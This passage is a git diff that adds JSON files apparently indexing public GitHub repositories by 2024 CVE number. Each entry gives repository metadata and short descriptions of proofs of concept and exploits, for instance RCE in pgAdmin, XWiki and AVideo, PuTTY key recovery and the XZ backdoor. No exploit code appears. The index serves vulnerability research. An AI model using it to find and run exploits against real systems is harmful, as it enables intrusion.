+ "owner": {
+ "login": "fevar54",
+ "id": 80516843,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/80516843?v=4",
+ "html_url": "https:\/\/github.com\/fevar54"
+ },
+ "html_url": "https:\/\/github.com\/fevar54\/Detectar-Backdoor-en-liblzma-de-XZ-utils-CVE-2024-3094-",
+ "description": "La siguiente regla YARA ayuda a detectar la presencia del backdoor en la librería liblzma comprometida en sistemas que utilizan las versiones 5.6.0 y 5.6.1 de la herramienta de compresión XZ.",
+ "fork": false,
+ "created_at": "2024-04-13T16:37:32Z",
+ "updated_at": "2024-04-13T16:37:32Z",
+ "pushed_at": "2024-04-13T16:46:19Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 788459467,
+ "name": "xzwhy",
+ "full_name": "neuralinhibitor\/xzwhy",
+ "owner": {
+ "login": "neuralinhibitor",
+ "id": 1449788,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1449788?v=4",
+ "html_url": "https:\/\/github.com\/neuralinhibitor"
+ },
+ "html_url": "https:\/\/github.com\/neuralinhibitor\/xzwhy",
+ "description": "XZ Utils CVE-2024-3094 POC for Kubernetes",
+ "fork": false,
+ "created_at": "2024-04-18T13:08:05Z",
+ "updated_at": "2024-06-05T21:05:19Z",
+ "pushed_at": "2024-04-18T15:09:42Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 813672523,
+ "name": "CVE-2024-3094",
+ "full_name": "shefirot\/CVE-2024-3094",
+ "owner": {
+ "login": "shefirot",
+ "id": 24395852,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24395852?v=4",
+ "html_url": "https:\/\/github.com\/shefirot"
+ },
+ "html_url": "https:\/\/github.com\/shefirot\/CVE-2024-3094",
+ "description": "Basic POC to test CVE-2024-3094 vulnerability inside K8s cluster",
+ "fork": false,
+ "created_at": "2024-06-11T14:19:17Z",
+ "updated_at": "2024-06-11T14:21:23Z",
+ "pushed_at": "2024-06-11T14:21:20Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-30956.json b/2024/CVE-2024-30956.json
new file mode 100644
index 0000000000..fa04b58b12
--- /dev/null
+++ b/2024/CVE-2024-30956.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 781338781,
+ "name": "CVE-2024-30956",
+ "full_name": "leoCottret\/CVE-2024-30956",
+ "owner": {
+ "login": "leoCottret",
+ "id": 71428793,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71428793?v=4",
+ "html_url": "https:\/\/github.com\/leoCottret"
+ },
+ "html_url": "https:\/\/github.com\/leoCottret\/CVE-2024-30956",
+ "description": "(DOM-based XSS) HTML Injection vulnerability in TOWeb v.12.05 and before allows an attacker to inject HTML\/JS code via the _message.html component.",
+ "fork": false,
+ "created_at": "2024-04-03T07:38:11Z",
+ "updated_at": "2024-06-24T11:19:11Z",
+ "pushed_at": "2024-06-24T11:19:08Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-30973.json b/2024/CVE-2024-30973.json
new file mode 100644
index 0000000000..bf278bc08f
--- /dev/null
+++ b/2024/CVE-2024-30973.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 791383768,
+ "name": "CVE-2024-30973",
+ "full_name": "Athos-Zago\/CVE-2024-30973",
+ "owner": {
+ "login": "Athos-Zago",
+ "id": 76454989,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76454989?v=4",
+ "html_url": "https:\/\/github.com\/Athos-Zago"
+ },
+ "html_url": "https:\/\/github.com\/Athos-Zago\/CVE-2024-30973",
+ "description": " POC VIDEO - https:\/\/youtu.be\/hNzmkJj-ImM?si=NF0yoSL578rNy7wN",
+ "fork": false,
+ "created_at": "2024-04-24T16:10:22Z",
+ "updated_at": "2024-04-26T14:57:17Z",
+ "pushed_at": "2024-04-26T14:57:14Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-30998.json b/2024/CVE-2024-30998.json
new file mode 100644
index 0000000000..39d781cbfe
--- /dev/null
+++ b/2024/CVE-2024-30998.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 779634369,
+ "name": "CVE-2024-30998",
+ "full_name": "efekaanakkar\/CVE-2024-30998",
+ "owner": {
+ "login": "efekaanakkar",
+ "id": 130908672,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/130908672?v=4",
+ "html_url": "https:\/\/github.com\/efekaanakkar"
+ },
+ "html_url": "https:\/\/github.com\/efekaanakkar\/CVE-2024-30998",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-03-30T11:18:21Z",
+ "updated_at": "2024-05-25T22:56:19Z",
+ "pushed_at": "2024-05-25T22:56:16Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-3116.json b/2024/CVE-2024-3116.json
new file mode 100644
index 0000000000..3e6d844daf
--- /dev/null
+++ b/2024/CVE-2024-3116.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 783453075,
+ "name": "CVE-2024-3116_RCE_in_pgadmin_8.4",
+ "full_name": "TechieNeurons\/CVE-2024-3116_RCE_in_pgadmin_8.4",
+ "owner": {
+ "login": "TechieNeurons",
+ "id": 94286332,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/94286332?v=4",
+ "html_url": "https:\/\/github.com\/TechieNeurons"
+ },
+ "html_url": "https:\/\/github.com\/TechieNeurons\/CVE-2024-3116_RCE_in_pgadmin_8.4",
+ "description": "Making a lab and testing the CVE-2024-3116, a Remote Code Execution in pgadmin <=8.4",
+ "fork": false,
+ "created_at": "2024-04-07T23:03:55Z",
+ "updated_at": "2024-05-15T07:27:30Z",
+ "pushed_at": "2024-04-11T01:38:55Z",
+ "stargazers_count": 9,
+ "watchers_count": 9,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 9,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-31210.json b/2024/CVE-2024-31210.json
new file mode 100644
index 0000000000..579fd7f0db
--- /dev/null
+++ b/2024/CVE-2024-31210.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 814403822,
+ "name": "CVE-2024-31210",
+ "full_name": "Abo5\/CVE-2024-31210",
+ "owner": {
+ "login": "Abo5",
+ "id": 40110835,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40110835?v=4",
+ "html_url": "https:\/\/github.com\/Abo5"
+ },
+ "html_url": "https:\/\/github.com\/Abo5\/CVE-2024-31210",
+ "description": "This Ruby script checks if a given WordPress site is vulnerable to CVE-2024-31210, which allows administrator-level users on single-site installations and Super Admin-level users on Multisite installations to execute arbitrary PHP code via the plugin upload mechanism.",
+ "fork": false,
+ "created_at": "2024-06-13T00:24:56Z",
+ "updated_at": "2024-06-13T00:27:46Z",
+ "pushed_at": "2024-06-13T00:27:43Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-31351.json b/2024/CVE-2024-31351.json
new file mode 100644
index 0000000000..e5e9235844
--- /dev/null
+++ b/2024/CVE-2024-31351.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 805642345,
+ "name": "CVE-2024-31351_wordpress_exploit",
+ "full_name": "KTN1990\/CVE-2024-31351_wordpress_exploit",
+ "owner": {
+ "login": "KTN1990",
+ "id": 33407405,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33407405?v=4",
+ "html_url": "https:\/\/github.com\/KTN1990"
+ },
+ "html_url": "https:\/\/github.com\/KTN1990\/CVE-2024-31351_wordpress_exploit",
+ "description": "Wordpress - Copymatic – AI Content Writer & Generator <= 1.6 - Unauthenticated Arbitrary File Upload",
+ "fork": false,
+ "created_at": "2024-05-25T04:02:23Z",
+ "updated_at": "2024-06-19T22:38:20Z",
+ "pushed_at": "2024-05-25T04:06:08Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-31497.json b/2024/CVE-2024-31497.json
new file mode 100644
index 0000000000..fe67dda36a
--- /dev/null
+++ b/2024/CVE-2024-31497.json
@@ -0,0 +1,100 @@
+[
+ {
+ "id": 787723118,
+ "name": "CVE-2024-31497",
+ "full_name": "sh1k4ku\/CVE-2024-31497",
+ "owner": {
+ "login": "sh1k4ku",
+ "id": 74185433,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74185433?v=4",
+ "html_url": "https:\/\/github.com\/sh1k4ku"
+ },
+ "html_url": "https:\/\/github.com\/sh1k4ku\/CVE-2024-31497",
+ "description": " A script designed to uncover vulnerabilities in Putty by exploiting CVE-2024-31497.",
+ "fork": false,
+ "created_at": "2024-04-17T04:00:20Z",
+ "updated_at": "2024-04-17T04:01:30Z",
+ "pushed_at": "2024-04-17T04:00:34Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 787871319,
+ "name": "cve-2024-31497",
+ "full_name": "edutko\/cve-2024-31497",
+ "owner": {
+ "login": "edutko",
+ "id": 1013264,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1013264?v=4",
+ "html_url": "https:\/\/github.com\/edutko"
+ },
+ "html_url": "https:\/\/github.com\/edutko\/cve-2024-31497",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-04-17T10:43:42Z",
+ "updated_at": "2024-04-25T09:08:10Z",
+ "pushed_at": "2024-04-17T10:44:19Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 798816693,
+ "name": "CVE-2024-31497-POC",
+ "full_name": "HugoBond\/CVE-2024-31497-POC",
+ "owner": {
+ "login": "HugoBond",
+ "id": 72299419,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72299419?v=4",
+ "html_url": "https:\/\/github.com\/HugoBond"
+ },
+ "html_url": "https:\/\/github.com\/HugoBond\/CVE-2024-31497-POC",
+ "description": "Proof Of Concept that exploits PuTTy CVE-2024-31497.",
+ "fork": false,
+ "created_at": "2024-05-10T14:30:50Z",
+ "updated_at": "2024-06-18T18:14:02Z",
+ "pushed_at": "2024-05-11T13:33:17Z",
+ "stargazers_count": 8,
+ "watchers_count": 8,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve",
+ "cve-2024-31497",
+ "ecdsa",
+ "exploit",
+ "poc",
+ "putty",
+ "vulnerability"
+ ],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 8,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-3154.json b/2024/CVE-2024-3154.json
new file mode 100644
index 0000000000..1de2099ffd
--- /dev/null
+++ b/2024/CVE-2024-3154.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 793352386,
+ "name": "CVE-2024-3154-communication",
+ "full_name": "cdxiaodong\/CVE-2024-3154-communication",
+ "owner": {
+ "login": "cdxiaodong",
+ "id": 84082748,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/84082748?v=4",
+ "html_url": "https:\/\/github.com\/cdxiaodong"
+ },
+ "html_url": "https:\/\/github.com\/cdxiaodong\/CVE-2024-3154-communication",
+ "description": "how does it run?",
+ "fork": false,
+ "created_at": "2024-04-29T04:03:11Z",
+ "updated_at": "2024-04-29T04:31:19Z",
+ "pushed_at": "2024-04-29T04:31:17Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-31719.json b/2024/CVE-2024-31719.json
new file mode 100644
index 0000000000..d88d6ef2c3
--- /dev/null
+++ b/2024/CVE-2024-31719.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 672397199,
+ "name": "CVE-2024-31719----AMI-Aptio-5-Vulnerability",
+ "full_name": "VoltaireYoung\/CVE-2024-31719----AMI-Aptio-5-Vulnerability",
+ "owner": {
+ "login": "VoltaireYoung",
+ "id": 44109336,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44109336?v=4",
+ "html_url": "https:\/\/github.com\/VoltaireYoung"
+ },
+ "html_url": "https:\/\/github.com\/VoltaireYoung\/CVE-2024-31719----AMI-Aptio-5-Vulnerability",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-07-30T00:07:14Z",
+ "updated_at": "2024-04-15T05:38:12Z",
+ "pushed_at": "2024-04-15T05:40:40Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 0
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-31734.json b/2024/CVE-2024-31734.json
new file mode 100644
index 0000000000..6bdcf78b0c
--- /dev/null
+++ b/2024/CVE-2024-31734.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 786721914,
+ "name": "CVE-2024-31734",
+ "full_name": "HBLocker\/CVE-2024-31734",
+ "owner": {
+ "login": "HBLocker",
+ "id": 48737752,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48737752?v=4",
+ "html_url": "https:\/\/github.com\/HBLocker"
+ },
+ "html_url": "https:\/\/github.com\/HBLocker\/CVE-2024-31734",
+ "description": "CVE-2024-31734",
+ "fork": false,
+ "created_at": "2024-04-15T07:19:10Z",
+ "updated_at": "2024-04-15T07:19:11Z",
+ "pushed_at": "2024-04-17T09:15:50Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-31771.json b/2024/CVE-2024-31771.json
new file mode 100644
index 0000000000..c9cb74d70b
--- /dev/null
+++ b/2024/CVE-2024-31771.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 784845906,
+ "name": "CVE-2024-31771",
+ "full_name": "restdone\/CVE-2024-31771",
+ "owner": {
+ "login": "restdone",
+ "id": 42227817,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42227817?v=4",
+ "html_url": "https:\/\/github.com\/restdone"
+ },
+ "html_url": "https:\/\/github.com\/restdone\/CVE-2024-31771",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-04-10T17:09:34Z",
+ "updated_at": "2024-05-12T23:00:33Z",
+ "pushed_at": "2024-05-12T19:59:56Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-31777.json b/2024/CVE-2024-31777.json
new file mode 100644
index 0000000000..bb62561f71
--- /dev/null
+++ b/2024/CVE-2024-31777.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 785244056,
+ "name": "Exploit-CVE-2024-31777",
+ "full_name": "FreySolarEye\/Exploit-CVE-2024-31777",
+ "owner": {
+ "login": "FreySolarEye",
+ "id": 44547688,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44547688?v=4",
+ "html_url": "https:\/\/github.com\/FreySolarEye"
+ },
+ "html_url": "https:\/\/github.com\/FreySolarEye\/Exploit-CVE-2024-31777",
+ "description": "Public exploit for CVE-2024-31777",
+ "fork": false,
+ "created_at": "2024-04-11T13:48:19Z",
+ "updated_at": "2024-06-08T09:01:12Z",
+ "pushed_at": "2024-06-08T09:01:09Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-31819.json b/2024/CVE-2024-31819.json
new file mode 100644
index 0000000000..6056f076b0
--- /dev/null
+++ b/2024/CVE-2024-31819.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 778341084,
+ "name": "CVE-2024-31819",
+ "full_name": "Chocapikk\/CVE-2024-31819",
+ "owner": {
+ "login": "Chocapikk",
+ "id": 88535377,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88535377?v=4",
+ "html_url": "https:\/\/github.com\/Chocapikk"
+ },
+ "html_url": "https:\/\/github.com\/Chocapikk\/CVE-2024-31819",
+ "description": "Unauthenticated Remote Code Execution (RCE) Vulnerability in WWBNIndex Plugin of AVideo Platform from 12.4 to 14.2",
+ "fork": false,
+ "created_at": "2024-03-27T14:41:10Z",
+ "updated_at": "2024-04-13T20:32:23Z",
+ "pushed_at": "2024-04-11T20:51:33Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 812561319,
+ "name": "CVE-2024-31819",
+ "full_name": "Jhonsonwannaa\/CVE-2024-31819",
+ "owner": {
+ "login": "Jhonsonwannaa",
+ "id": 114837630,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/114837630?v=4",
+ "html_url": "https:\/\/github.com\/Jhonsonwannaa"
+ },
+ "html_url": "https:\/\/github.com\/Jhonsonwannaa\/CVE-2024-31819",
+ "description": "An issue in WWBN AVideo v.12.4 through v.14.2 allows a remote attacker to execute arbitrary code via the systemRootPath parameter of the submitIndex.php component.",
+ "fork": false,
+ "created_at": "2024-06-09T08:48:21Z",
+ "updated_at": "2024-06-21T21:06:38Z",
+ "pushed_at": "2024-06-21T21:06:34Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-31848.json b/2024/CVE-2024-31848.json
new file mode 100644
index 0000000000..c9195a100b
--- /dev/null
+++ b/2024/CVE-2024-31848.json
@@ -0,0 +1,42 @@
+[
+ {
+ "id": 797175885,
+ "name": "CVE-2024-31848-PoC",
+ "full_name": "Stuub\/CVE-2024-31848-PoC",
+ "owner": {
+ "login": "Stuub",
+ "id": 60468836,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60468836?v=4",
+ "html_url": "https:\/\/github.com\/Stuub"
+ },
+ "html_url": "https:\/\/github.com\/Stuub\/CVE-2024-31848-PoC",
+ "description": "PoC for Exploiting CVE-2024-31848\/49\/50\/51 - File Path Traversal ",
+ "fork": false,
+ "created_at": "2024-05-07T10:42:03Z",
+ "updated_at": "2024-06-21T18:37:49Z",
+ "pushed_at": "2024-05-07T17:54:28Z",
+ "stargazers_count": 15,
+ "watchers_count": 15,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cdata",
+ "cve-2024-31848",
+ "cve-2024-31849",
+ "cve-2024-31850",
+ "cve-2024-31851",
+ "jetty",
+ "poc",
+ "threat",
+ "threat-intel"
+ ],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 15,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-31974.json b/2024/CVE-2024-31974.json
new file mode 100644
index 0000000000..f7012f97b3
--- /dev/null
+++ b/2024/CVE-2024-31974.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 801830634,
+ "name": "com.solarized.firedown",
+ "full_name": "actuator\/com.solarized.firedown",
+ "owner": {
+ "login": "actuator",
+ "id": 78701239,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78701239?v=4",
+ "html_url": "https:\/\/github.com\/actuator"
+ },
+ "html_url": "https:\/\/github.com\/actuator\/com.solarized.firedown",
+ "description": "CVE-2024-31974",
+ "fork": false,
+ "created_at": "2024-05-17T02:02:00Z",
+ "updated_at": "2024-05-17T02:14:05Z",
+ "pushed_at": "2024-05-17T02:10:57Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-31982.json b/2024/CVE-2024-31982.json
new file mode 100644
index 0000000000..6da11193ae
--- /dev/null
+++ b/2024/CVE-2024-31982.json
@@ -0,0 +1,92 @@
+[
+ {
+ "id": 818584647,
+ "name": "CVE-2024-31982",
+ "full_name": "k3lpi3b4nsh33\/CVE-2024-31982",
+ "owner": {
+ "login": "k3lpi3b4nsh33",
+ "id": 118002757,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/118002757?v=4",
+ "html_url": "https:\/\/github.com\/k3lpi3b4nsh33"
+ },
+ "html_url": "https:\/\/github.com\/k3lpi3b4nsh33\/CVE-2024-31982",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-06-22T08:47:20Z",
+ "updated_at": "2024-06-24T06:47:27Z",
+ "pushed_at": "2024-06-22T08:50:17Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 818721820,
+ "name": "CVE-2024-31982",
+ "full_name": "th3gokul\/CVE-2024-31982",
+ "owner": {
+ "login": "th3gokul",
+ "id": 89386101,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/89386101?v=4",
+ "html_url": "https:\/\/github.com\/th3gokul"
+ },
+ "html_url": "https:\/\/github.com\/th3gokul\/CVE-2024-31982",
+ "description": "A tool for vulnerability detection and exploitation tool for CVE-2024-31982 ",
+ "fork": false,
+ "created_at": "2024-06-22T17:04:02Z",
+ "updated_at": "2024-06-23T16:15:33Z",
+ "pushed_at": "2024-06-22T19:31:51Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 818783620,
+ "name": "CVE-2024-31982",
+ "full_name": "bigb0x\/CVE-2024-31982",
+ "owner": {
+ "login": "bigb0x",
+ "id": 13532434,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13532434?v=4",
+ "html_url": "https:\/\/github.com\/bigb0x"
+ },
+ "html_url": "https:\/\/github.com\/bigb0x\/CVE-2024-31982",
+ "description": "POC for CVE-2024-31982: XWiki Platform Remote Code Execution > 14.10.20",
+ "fork": false,
+ "created_at": "2024-06-22T21:20:33Z",
+ "updated_at": "2024-06-25T10:41:18Z",
+ "pushed_at": "2024-06-22T22:29:24Z",
+ "stargazers_count": 8,
+ "watchers_count": 8,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 8,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-320002.json b/2024/CVE-2024-320002.json
new file mode 100644
index 0000000000..d5cd827ed4
--- /dev/null
+++ b/2024/CVE-2024-320002.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 817700177,
+ "name": "hook",
+ "full_name": "bonnettheo\/hook",
+ "owner": {
+ "login": "bonnettheo",
+ "id": 33837840,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33837840?v=4",
+ "html_url": "https:\/\/github.com\/bonnettheo"
+ },
+ "html_url": "https:\/\/github.com\/bonnettheo\/hook",
+ "description": "submodule for CVE-2024-320002",
+ "fork": false,
+ "created_at": "2024-06-20T09:02:23Z",
+ "updated_at": "2024-06-21T14:23:27Z",
+ "pushed_at": "2024-06-21T14:23:25Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-32002.json b/2024/CVE-2024-32002.json
new file mode 100644
index 0000000000..90a4c70dae
--- /dev/null
+++ b/2024/CVE-2024-32002.json
@@ -0,0 +1,1498 @@
+[
+ {
+ "id": 802138178,
+ "name": "CVE-2024-32002",
+ "full_name": "markuta\/CVE-2024-32002",
+ "owner": {
+ "login": "markuta",
+ "id": 9108334,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9108334?v=4",
+ "html_url": "https:\/\/github.com\/markuta"
+ },
+ "html_url": "https:\/\/github.com\/markuta\/CVE-2024-32002",
+ "description": "A proof of concept for the git vulnerability CVE-2024-32002",
+ "fork": false,
+ "created_at": "2024-05-17T15:35:50Z",
+ "updated_at": "2024-05-30T21:04:33Z",
+ "pushed_at": "2024-05-30T21:04:30Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 802139060,
+ "name": "hooky",
+ "full_name": "markuta\/hooky",
+ "owner": {
